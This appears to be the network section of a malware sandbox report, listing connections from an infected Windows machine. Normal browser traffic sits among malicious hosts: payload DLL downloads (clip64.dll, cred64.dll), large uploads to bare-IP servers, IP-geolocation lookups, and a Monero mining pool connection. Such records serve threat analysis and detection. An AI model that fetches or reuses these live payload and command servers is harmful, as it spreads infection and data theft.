https://zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs

tls, http2

MicrosoftEdgeCP.exe

2.4kB
14.4kB
31
25

HTTP Request

POST https://zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs

HTTP Response

200
104.17.209.240:443

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
5.5kB
15
11
23.207.106.113:443

https://steamcommunity.com/favicon.ico

tls, http

MicrosoftEdge.exe

2.5kB
44.6kB
41
39

HTTP Request

GET https://steamcommunity.com/favicon.ico

HTTP Response

200
23.207.106.113:443

steamcommunity.com

tls

MicrosoftEdge.exe

887 B
4.5kB
12
9
104.85.0.101:443

store.steampowered.com

tls

MicrosoftEdge.exe

891 B
4.3kB
12
9
104.85.0.101:443

https://store.steampowered.com/favicon.ico

tls, http

MicrosoftEdge.exe

2.5kB
44.4kB
40
38

HTTP Request

GET https://store.steampowered.com/favicon.ico

HTTP Response

200
163.70.151.21:443

static.xx.fbcdn.net

tls, http2

MicrosoftEdge.exe

1.2kB
4.0kB
16
13
163.70.151.21:443

https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico

tls, http2

MicrosoftEdge.exe

1.6kB
5.9kB
20
16

HTTP Request

GET https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico

HTTP Response

200
142.250.179.141:443

https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

tls, http2

MicrosoftEdgeCP.exe

1.7kB
6.5kB
18
15

HTTP Request

GET https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

HTTP Response

302
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.1kB
13
10
18.239.36.22:443

https://static-assets-prod.unrealengine.com/account-portal/static/epic-favicon-96x96.png

tls, http2

MicrosoftEdge.exe

1.6kB
12.9kB
21
17

HTTP Request

GET https://static-assets-prod.unrealengine.com/account-portal/static/epic-favicon-96x96.png

HTTP Response

200
18.239.36.22:443

static-assets-prod.unrealengine.com

tls, http2

MicrosoftEdge.exe

1.1kB
6.7kB
15
12
172.64.146.120:443

https://talon-website-prod.ecosec.on.epicgames.com/talon_sdk.js

tls, http2

MicrosoftEdgeCP.exe

12.2kB
326.6kB
248
242

HTTP Request

GET https://talon-website-prod.ecosec.on.epicgames.com/talon_sdk.js

HTTP Response

200
172.64.146.120:443

talon-website-prod.ecosec.on.epicgames.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
3.6kB
14
10
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

3.8kB
94.8kB
75
74

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
23.207.106.113:443

api.steampowered.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
4.8kB
14
13
23.207.106.113:443

https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

tls, http2

MicrosoftEdgeCP.exe

9.0kB
5.7kB
27
24

HTTP Request

POST https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

HTTP Response

200

HTTP Request

POST https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

HTTP Response

200
18.65.40.94:80

http://crl.rootca1.amazontrust.com/rootca1.crl

http

MicrosoftEdge.exe

415 B
1.5kB
6
5

HTTP Request

GET http://crl.rootca1.amazontrust.com/rootca1.crl

HTTP Response

200
23.207.106.113:443

https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

tls, http2

MicrosoftEdgeCP.exe

6.0kB
5.7kB
24
23

HTTP Request

POST https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

HTTP Response

200

HTTP Request

POST https://api.steampowered.com/IClientMetricsService/ReportClientError/v1

HTTP Response

200
23.207.106.113:443

api.steampowered.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
4.8kB
14
13
172.64.146.120:443

https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

tls, http2

MicrosoftEdgeCP.exe

4.8kB
6.3kB
33
30

HTTP Request

OPTIONS https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

HTTP Request

OPTIONS https://talon-service-prod.ecosec.on.epicgames.com/v1/init

HTTP Response

204

HTTP Request

POST https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

HTTP Response

204

HTTP Response

204

HTTP Request

POST https://talon-service-prod.ecosec.on.epicgames.com/v1/init

HTTP Response

200

HTTP Request

POST https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

HTTP Response

204

HTTP Request

POST https://talon-service-prod.ecosec.on.epicgames.com/v1/phaser/batch

HTTP Response

204
172.64.146.120:443

talon-service-prod.ecosec.on.epicgames.com

tls, http2

MicrosoftEdgeCP.exe

955 B
3.6kB
11
9
104.19.219.90:443

https://js.hcaptcha.com/1/api.js?onload=hCaptchaLoaded&render=explicit

tls, http2

MicrosoftEdgeCP.exe

5.8kB
102.8kB
112
108

HTTP Request

GET https://js.hcaptcha.com/1/api.js?onload=hCaptchaLoaded&render=explicit

HTTP Response

200
104.19.219.90:443

js.hcaptcha.com

tls, http2

MicrosoftEdgeCP.exe

914 B
3.5kB
11
8
192.229.221.25:443

https://t.paypal.com/ts?v=1.8.7&t=1698648561353&g=0&page=main%3Aauthchallenge%3A%3Asignin&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&view=%7B%22t10%22%3A0%2C%22t11%22%3A31000%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(1)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer()%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf

tls, http2

MicrosoftEdgeCP.exe

4.5kB
10.9kB
23
19

HTTP Request

GET https://t.paypal.com/ts?v=1.8.7&t=1698648548391&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&e=im&imsrc=setup&view=%7B%22t10%22%3A2851%2C%22t11%22%3A31000%2C%22tcp%22%3A14705%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A26256%7D&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=2851&t1c=0&t1d=0&t1s=0&t2=267&t3=6278&t4d=0&t4=11586&t4e=14705&tt=14705&rdc=0&res=%7B%7D

HTTP Response

200

HTTP Request

GET https://t.paypal.com/ts?v=1.8.7&t=1698648560659&g=0&e=err&page=main%3Aauthchallenge%3A%3Asignin&pgrp=main%3Aauthchallenge%3A%3Asignin&comp=authchallengenodeweb&erpg=Script%20error&error_type=WINDOW_ONERROR&error_source=-%200%3A0

HTTP Request

GET https://t.paypal.com/ts?v=1.8.7&t=1698648561353&g=0&page=main%3Aauthchallenge%3A%3Asignin&pgst=1698648501523&calc=0752753582382&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=236cbef091eb49f2acf1cee5cc5ead9e&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&xe=107585&xt=135393&view=%7B%22t10%22%3A0%2C%22t11%22%3A31000%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(1)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer()%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf

HTTP Response

200

HTTP Response

200
192.229.221.25:443

t.paypal.com

tls, http2

MicrosoftEdgeCP.exe

1.4kB
8.8kB
19
17
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

63.6kB
1.4MB
1032
1049

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
149.40.62.171:15666

2D8A.exe

1.8MB
16.9kB
1279
421
204.79.197.200:443

ieonline.microsoft.com

tls, http2

MicrosoftEdge.exe

1.3kB
8.4kB
17
16
104.19.218.90:443

newassets.hcaptcha.com

tls, http2

MicrosoftEdgeCP.exe

921 B
3.5kB
11
8
104.19.218.90:443

https://newassets.hcaptcha.com/c/78ee6fc/hsj.js

tls, http2

MicrosoftEdgeCP.exe

16.3kB
376.1kB
335
330

HTTP Request

GET https://newassets.hcaptcha.com/captcha/v1/19a0fd9/static/hcaptcha.html

HTTP Response

200

HTTP Request

GET https://newassets.hcaptcha.com/captcha/v1/19a0fd9/hcaptcha.js

HTTP Response

200

HTTP Request

GET https://newassets.hcaptcha.com/c/78ee6fc/hsj.js

HTTP Response

200
173.231.16.77:443

https://api.ipify.org/

tls, http

2D8A.exe

1.2kB
7.1kB
18
13

HTTP Request

GET https://api.ipify.org/

HTTP Response

200
194.49.94.11:80

http://194.49.94.11/

http

2FDC.exe

7.1MB
50.4kB
5088
767

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200
95.214.26.28:80

http://host-host-file8.com/

http

Explorer.EXE

758 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
77.91.124.86:19084

FD8D.exe

156 B
3
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

tls, http2

MicrosoftEdgeCP.exe

5.4kB
119.4kB
97
94

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.1kB
13
10
77.91.124.86:19084

2lO462aT.exe

156 B
3
104.19.219.90:443

hcaptcha.com

tls, http2

MicrosoftEdgeCP.exe

879 B
3.5kB
10
9
104.19.219.90:443

https://hcaptcha.com/checksiteconfig?v=19a0fd9&host=www.epicgames.com&sitekey=5928de2d-2800-4c58-be91-060e5a6aa117&sc=1&swa=0&spst=0

tls, http2

MicrosoftEdgeCP.exe

1.5kB
4.9kB
16
13

HTTP Request

POST https://hcaptcha.com/checksiteconfig?v=19a0fd9&host=www.epicgames.com&sitekey=5928de2d-2800-4c58-be91-060e5a6aa117&sc=1&swa=0&spst=0

HTTP Response

200
104.26.12.31:443

https://api.ip.sb/geoip

tls, http

2FDC.exe

707 B
4.2kB
8
6

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
146.70.169.164:2227

schtasks.exe

15.3kB
212 B
14
5
142.251.39.118:443

https://i.ytimg.com/generate_204

tls, http2

MicrosoftEdgeCP.exe

1.5kB
5.7kB
17
11

HTTP Request

GET https://i.ytimg.com/generate_204

HTTP Response

204
142.251.39.118:443

i.ytimg.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.5kB
14
10
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.1kB
13
11
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

tls, http2

MicrosoftEdgeCP.exe

5.4kB
117.6kB
97
94

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

HTTP Response

200
192.229.221.25:443

www.paypal.com

tls, http2

MicrosoftEdgeCP.exe

1.5kB
8.8kB
20
17
192.229.221.25:443

https://www.paypal.com/csplog/api/log/csp

tls, http2

MicrosoftEdgeCP.exe

9.4kB
24.6kB
45
39

HTTP Request

POST https://www.paypal.com/auth/validatecaptcha

HTTP Response

200

HTTP Request

POST https://www.paypal.com/auth/logclientdata

HTTP Response

200

HTTP Request

POST https://www.paypal.com/auth/logclientdata

HTTP Response

200

HTTP Request

POST https://www.paypal.com/csplog/api/log/csp

HTTP Response

200
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
192.229.221.25:443

https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-helpers-supplement.js

tls, http2

MicrosoftEdgeCP.exe

3.0kB
29.7kB
39
33

HTTP Request

GET https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v2.html?siteKey=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&locale.x=en_US&country.x=US&checkConnectionTimeout=10000&reCaptchaEnterpriseEnabled=true

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/backbone-0.9.2.js

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/js/lib/dust-helpers-supplement.js

HTTP Response

200
192.229.221.25:443

www.paypalobjects.com

tls, http2

MicrosoftEdgeCP.exe

1.4kB
8.7kB
19
16
142.250.179.163:443

https://www.recaptcha.net/recaptcha/enterprise/bframe?hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG

tls, http2

MicrosoftEdgeCP.exe

4.3kB
54.5kB
65
61

HTTP Request

GET https://www.recaptcha.net/recaptcha/enterprise.js?onload=recaptchaEnterpriseCallback&render=explicit&hl=en

HTTP Response

200

HTTP Request

GET https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&theme=light&size=normal&cb=qxzlq56mq2h

HTTP Response

200

HTTP Request

GET https://www.recaptcha.net/recaptcha/enterprise/bframe?hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&k=6LeZ6egUAAAAAGwL8CjkDE8dcSw2DtvuVpdwTkwG

HTTP Response

200
142.250.179.163:443

www.recaptcha.net

tls, http2

MicrosoftEdgeCP.exe

1.3kB
12.1kB
19
16
142.251.39.118:443

https://i.ytimg.com/generate_204

tls, http2

MicrosoftEdgeCP.exe

1.4kB
5.7kB
15
11

HTTP Request

GET https://i.ytimg.com/generate_204

HTTP Response

204
142.251.39.118:443

i.ytimg.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.5kB
13
11
104.17.209.240:443

https://zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs

tls, http2

MicrosoftEdgeCP.exe

2.3kB
14.2kB
29
24

HTTP Request

POST https://zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs

HTTP Response

200
104.17.209.240:443

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

tls, http2

MicrosoftEdgeCP.exe

1.1kB
5.5kB
14
11
192.229.221.25:443

https://t.paypal.com/ts?v=1.8.7&t=1698648609453&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&e=im&imsrc=setup&view=%7B%22t10%22%3A474%2C%22t11%22%3A18412%2C%22tcp%22%3A1946%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A11568%7D&ru=https%3A%2F%2Fwww.paypal.com%2Fsignin&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=474&t1c=0&t1d=0&t1s=0&t2=329&t3=20&t4d=6532&t4=6557&t4e=25&tt=7359&rdc=0&res=%7B%7D&rtt=326

tls, http2

MicrosoftEdgeCP.exe

5.0kB
11.0kB
25
21

HTTP Request

GET https://t.paypal.com/ts?v=1.8.7&t=1698648598408&g=0&e=err&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&comp=authchallengenodeweb&erpg=Script%20error&error_type=WINDOW_ONERROR&error_source=-%200%3A0

HTTP Response

200

HTTP Request

GET https://t.paypal.com/ts?v=1.8.7&t=1698648599932&g=0&page=main%3Aauthchallenge%3A%3Aauth%3Avalidatecaptcha&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&view=%7B%22t10%22%3A0%2C%22t11%22%3A5394%2C%22nt%22%3A%22manual%22%7D&ads_client_data=Navigator(appCodeName%3DMozilla%7CappName%3DNetscape%7CappVersion%3D5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7CuserAgent%3DMozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063%7Cwebdriverfalse%7CdeviceMemoryundefined%7Cgeolocation(Available)%7Clanguage%3Den-US%7ConLine%3Dtrue%7Cplatform%3DWin32%7Cproduct%3DGecko)%7CHistory(2)%7Cscreen(1280%2C720%2C1280%2C680%2C24%2C24)%7Cwindow(Width%3D800%7Cheight%3D556%7CmozRTCPeerConnection%3Dundefined%7CChrome%3D%5Bobject%20Object%5D%7CcallPhantom%3Dundefined%7C_phantom%3Dundefined%7Cstr%3Dundefined%7Clength%3D1%7CdevicePixelRatio%3D1)%7CloginPresent(false)%7CloginTitle()%7Creferrer(https%3A%2F%2Fwww.paypal.com%2Fsignin)%7Cplugins%3A(Shockwave%20Flash%20%7C%20Flash.ocx%20%7C%20Shockwave%20Flash%2025.0%20r0%20%7C%20)(Edge%20PDF%20Viewer%20%7C%20%20%7C%20Portable%20Document%20Format%20%7C%20)%7ChardwareConcurrency(2)%7CmozLockOrientation(undefined)%7CmozUnlockOrientation(undefined)%7CmozOrientation(undefined)%7CError(TypeError%3A%20Unable%20to%20get%20property%20'0'%20of%20undefined%20or%20null%20reference)&res=%7B%7D&e=pf

HTTP Response

200

HTTP Request

GET https://t.paypal.com/ts?v=1.8.7&t=1698648609453&g=0&pgrp=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&page=authchallengenodeweb%2Flayouts%2Fmaster.html.dust&pgst=1698648592937&calc=080b734a5b400&nsid=AQUVizFN1FmZUKFC1oFjJpB6tTVjuU55&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=26b33010f73b4228ba980976cd412631&comp=authchallengenodeweb&tsrce=authchallengenodeweb&cu=0&ef_policy=ccpa&e=im&imsrc=setup&view=%7B%22t10%22%3A474%2C%22t11%22%3A18412%2C%22tcp%22%3A1946%2C%22nt%22%3A%22navigate%22%2C%22bt%22%3A11568%7D&ru=https%3A%2F%2Fwww.paypal.com%2Fsignin&cd=24&sw=1280&sh=720&dw=1280&dh=720&bw=800&bh=556&ce=1&t1=474&t1c=0&t1d=0&t1s=0&t2=329&t3=20&t4d=6532&t4=6557&t4e=25&tt=7359&rdc=0&res=%7B%7D&rtt=326

HTTP Response

200
192.229.221.25:443

t.paypal.com

tls, http2

MicrosoftEdgeCP.exe

1.4kB
8.7kB
19
16
142.250.179.141:443

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

tls, http2

MicrosoftEdgeCP.exe

5.5kB
119.9kB
98
95

HTTP Request

GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxYmw_caghlYooEbFmtdOl4P6ypUSSryO9eVaSgVGmRnUGXEsUtH7k9M0Plab4aNyTp_ZFb&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S654493664%3A1698648498243179&theme=glif

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.1kB
13
10
142.251.39.118:443

https://i.ytimg.com/generate_204

tls, http2

MicrosoftEdgeCP.exe

1.4kB
5.7kB
16
12

HTTP Request

GET https://i.ytimg.com/generate_204

HTTP Response

204
142.251.39.118:443

i.ytimg.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.5kB
13
10
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
204.79.197.200:443

https://www.bing.com/cortanaassist/rules?cc=US&version=6

tls, http2

MicrosoftEdge.exe

3.8kB
58.9kB
64
63

HTTP Request

GET https://www.bing.com/cortanaassist/rules?cc=US&version=6

HTTP Response

404
204.79.197.200:443

www.bing.com

tls, http2

MicrosoftEdge.exe

1.4kB
8.4kB
17
16
194.169.175.235:42691

jsc.exe

1.9MB
30.7kB
1382
582
162.159.133.233:443

cdn.discordapp.com

tls

csrss.exe

1.3kB
5.8kB
15
17
185.82.216.108:443

server5.statsexplorer.org

tls

csrss.exe

1.4kB
6.6kB
14
17
188.114.97.0:443

walkinglate.com

tls

csrss.exe

122.7kB
5.7MB
2597
4139
51.15.58.224:14433

xmr-eu1.nanopool.org

tls

explorer.exe

1.4kB
3.4kB
9
8
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
172.67.34.170:443

pastebin.com

tls

explorer.exe

993 B
5.9kB
10
10
51.68.190.80:14433

xmr-eu1.nanopool.org

tls

explorer.exe

1.8kB
7.6kB
18
17
185.82.216.108:443

server5.statsexplorer.org

tls

csrss.exe

1.3kB
6.2kB
12
14
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
77.91.124.86:19084

FD8D.exe

156 B
3
77.91.124.86:19084

2lO462aT.exe

156 B
3
157.240.201.35:443

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1AE17U2ZwrU19E36w&__hs=19660.BP%3ADEFAULT.2.0..0.0&__hsi=7295639733956011473&__req=3&__rev=1009557466&__s=%3A%3Are4buh&__spin_b=trunk&__spin_r=1009557466&__spin_t=1698648495&__user=0&dpr=1&jazoest=2874&lsd=AVq5u4P-QqE

tls, http2

